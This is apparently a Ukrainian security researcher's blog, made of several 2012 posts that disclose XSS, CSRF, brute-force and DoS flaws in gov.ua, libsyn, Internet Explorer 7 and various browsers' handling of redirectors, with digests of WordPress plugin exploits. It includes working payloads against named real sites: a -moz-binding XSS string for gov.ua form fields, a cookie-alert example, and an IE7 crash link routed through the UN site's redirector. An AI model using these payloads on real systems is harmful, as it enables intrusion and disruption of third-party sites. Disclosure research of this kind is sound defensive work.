Websecurity - Веб безпека

Ще у травні, 04.05.2012, я виявив Content Spoofing уразливості в Open Source Media Framework (OSMF) та Strobe Media Playback. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

25.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting, Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.gov.ua - “головному” gov.ua домені. Про XSS мені повідомив AmplenuS, а коли я ці дірки перевірив, то знайшов іще BF, CSRF, AoF та IAA дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.12.2012

XSS:

POST запит на сторінці http://www.gov.ua/contact.html (це приклад коду для атаки на Mozilla і Firefox < 3.0, для інших браузерів можливі інші варіанти атакуючого коду).

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')"

В полях: Зворотня адреса, Ваше ПIБ, Доменне ім’я, Текст повідомлення.

Brute Force:

http://www.gov.ua/manager/

Cross-Site Request Forgery:

http://www.gov.ua/manager/

Abuse of Functionality:

В формі логіна http://www.gov.ua/manager/ можна виявляти логіни користувачів (Login enumeration).

Insufficient Anti-automation:

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів).

Якщо BF, AoF та IAA уразливості вже виправлені, шляхом обмеження доступу до папки з адмінкою (що не вирішило проблеми з CSRF), то XSS досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Facebook Survey, Simple Slider та Zingiri Web Shop. Для котрих з’явилися експлоіти. Facebook Survey - це плагін для проведення опитувань на FB, Simple Slider - це плагін для створення та управління слайдшоу, Zingiri Web Shop - це плагін для створення онлайн магазина.

• Wordpress Facebook Survey v1 - SQL Injection Vulnerability (деталі)
• XSS Vulnerability in Simple Slider Wordpress Plugin (деталі)
• WordPress Zingiri Web Shop 2.5.0 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information (деталі)
• Cross-Site Request Forgery (CSRF) in CMS Made Simple (деталі)
• BananaDance Wiki b2.2 - Multiple Web Vulnerabilities (деталі)
• Eventy CMS v1.8 Plus - Multiple Web Vulnerablities (деталі)
• (0Day) HP Intelligent Management Center img.exe Integer Wrap Remote Code Execution Vulnerability (деталі)
• iDev Rentals v1.0 - Multiple Web Vulnerabilities (деталі)
• Security advisory for Bugzilla 4.4rc1, 4.2.4, 4.0.9 and 3.6.12 (деталі)
• typo3-src security update (деталі)
• HP Serviceguard, Remote Denial of Service (DoS) (деталі)
• Django vulnerability (деталі)

У вересні, 27.09.2012, я знайшов Cross-Site Scripting уразливість на libsyn.com - в платформі libsyn (Liberated Syndication). Про що декілька разів сповіщав адміністрацію сайта, як по емайлу, так і через контакту форму (у вересні і в жовтні). Але вони проігнорували і так досі не виправили уразливість, що стосується великої кількості сайті на цій платформі.

XSS:

Приклад на одному сайті на libsyn:

• alert(document.cookie)
• цікавий

Скріншот:

libsyn XSS.png

Є багато веб сайтів вразливих до цієї XSS уразливості (в тому числі секюріті сайти). Майже всі сайти на платформі libsyn є вразливими (я перевірив чимало сайтів і більшість з них була вразлива).

За даними Гугл у libsyn.com велика кількість піддоменів. Сторінок на всіх піддоменах (окрім www.libsyn.com) було:

27.09.2012 - 1890000
01.12.2012 - 2080000

Це сторінок. З них можна вирахувати приблизну кількість сайтів Тобто на цій платформі розміщено орієнтовно від 100000 до одного мільйона сайтів.

В записі Cross-Site Scripting уразливості в різних браузерах, я згадував про DoS уразливості в сьомому IE. Ось детальна інформація про них.

Під час досліджень XSS в різних браузерах, 05.08.2010 та 16.09.2012, я виявив Denial of Service уразливості в Internet Explorer 7. Що цікаво, IE6 та IE8 невразливі, тільки IE7.

DoS:

При включенні редиректора з відповіддю 301, 302 або 303 і data: URI в заголовку Location у тег frame або iframe, браузер вибиває (атака не працює при інших 30x статусах). Це відбувається через access violation (aka segmentation fault) в iexplore.exe.

Експлоіт:

IE7 DoS.txt

Це 302 редиректор на Perl. А в якості 301 редиректора можете використати мій приклад з data: URI на TinyURL:

http://tinyurl.com/fj4hm

Атака спрацьовує лише з другої спроби. Тому потрібно двічі звернутися до редиректора (двічі вказати URL в адресному рядку, чи після появи сторінки про помилку повернутися на попередню сторінку в браузері).

Приклад атаки через уразливість на сайті ООН:

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm

Уразливі Internet Explorer 7 (7.00.5730.13) та інші версії IE7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wordpress Brute Force Tool, WP E-Commerce та Tagged Albums. Для котрих з’явилися експлоіти. Wordpress Brute Force Tool - це інструмент для проведення брутфорс атак на Wordpress, WP E-Commerce - це плагін для створення онлайн магазину, Tagged Albums - це плагін для створення фото альбомів з тегами.

• Janissaries Wordpress Brute Force Tool (деталі)
• WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting (деталі)
• WordPress Tagged Albums SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Novell eDirectory RelativeToFullDN Parsing Remote Code Execution Vulnerability (деталі)
• NetCat CMS v5.0.1 - Multiple Web Vulnerabilities (деталі)
• PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities (деталі)
• VaM Shop v1.69 - Multiple Web Vulnerabilities (деталі)
• GE Proficy Real-Time Information Portal Remote Interface Service Remote Code Execution Vulnerability (деталі)
• XSS in dokeos 2.1.1 (деталі)
• EmpireCMS Template Parser Remote PHP Code Execution Vulnerability (деталі)
• AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities (деталі)
• Lsoft ListServ v16 (WA revision R4241) SHOWTPL parameter Cross-SIte Scripting - XSS (деталі)
• Vulnerability Report on AWCM 2.2 (деталі)

05.08.2010

У листопаді, 30.11.2009, я виявив Cross-Site Scripting уразливості в різних браузерах. Зокрема в Mozilla Firefox, Internet Explorer, Google Chrome та Opera.

Дані уразливості дозволяють виконувати XSS атаки на численні сайти, в тому числі ті, що не мають XSS уразливостей (блокують відповідні XSS атаки). Тобто браузери дозволяють обходити дані XSS фільтри. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам браузерів.

28.11.2012

Дане дослідження є продовженням моїх досліджень Cross-Site Scripting атаки через редиректори та Cross-Site Scripting через редиректори 301 і 303 в різних браузерах (зроблених в 2009 і 2012 роках відповідно). Після анонсу в серпні 2010, я планував встановити декілька нових браузерів, провести дослідження в них (на додачу до раніше зроблених в інших браузерах) і найближчим часом опублікувати результати, але публікація відклалася. Лише у вересні цього року я зробив додаткові дослідження з 301 і 303 редиректорами (для вищезгаданої і цієї статті), та почав оприлюднювати результати.

Редиректори можуть використовуватися для проведення XSS атак на сайти, що дозволяють вказувати адресу фрейма. При включенні редиректора у frame чи iframe можна провести XSS атаку. Це Remote XSS Include (RXI) підкласс Cross-Site Scripting уразливостей і вони достатньо поширені в Інтернеті.

Код спрацює по різному в різних браузерах - так само як і при прямому запиті до редиректорів, описаних у вищезгаданих статтях. В одних браузерах працює атака через одні редиректори, в інших - через інші.

XSS:

Атака працює в наступних редиректорах:

1. Через Location редиректор (301 Moved Permanently) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 без доступу до кукісів та DoS в IE7
2. Через Location редиректор (301 Moved Permanently) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів
3. Через Location редиректор (302 Found) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 (як Strictly social XSS) без доступу до кукісів та DoS в IE7
4. Через Location редиректор (302 Found, Object Moved або Moved Temporarily) javascript: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28 як Strictly social XSS, код виконається в контексті сайта з редиректором, Opera 10.62 (як Strictly social XSS без доступу до кукісів)
5. Через Refresh редиректор data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 без доступу до кукісів та Chrome
6. Через Refresh редиректор javascript: URI - працює в Firefox (до версії 3.0.9), IE6, Chrome та Opera 9.52 (до версії 10)
7. Через Location редиректор (303 See other) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 10.62 без доступу до кукісів та DoS в IE7
8. Через Location редиректор (303 See other) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів

Атака №4 працює в Mozilla Firefox 8.0.1 та попередніх версіях, а в версіях 9.0.1, 10.0.7, 15.0.1 вже ні - видає “Corrupted Content Error”. Тобто дана уразливість була приховано виправлена в версії 9.0. Мозілі я повідомив про ці атаки на їхній браузер ще 07.08.2010.

Дані уразливості дозволяють проводити універсальну XSS атаку на сайтах, що дозволяють вказувати адресу frame/iframe, навіть якщо вони напряму не допускають XSS (блокують javascript, vbscript і data URI). Найкраще для атаки підходить Refresh-редиректори.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Calendar-Script, Eco-Annu та Related Posts Exit Popup. Для котрих з’явилися експлоіти. Calendar-Script - це органайзер і календар, Eco-Annu - це плагін для створення карти на базі Google Maps, Related Posts Exit Popup - це плагін для виведення попапу з пов’язаними постами при закритті сторінки сайта.

• WordPress Calendar-Script Blind SQL Injection (деталі)
• WordPress Eco-Annu SQL Injection (деталі)
• WordPress Related Posts Exit Popup SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.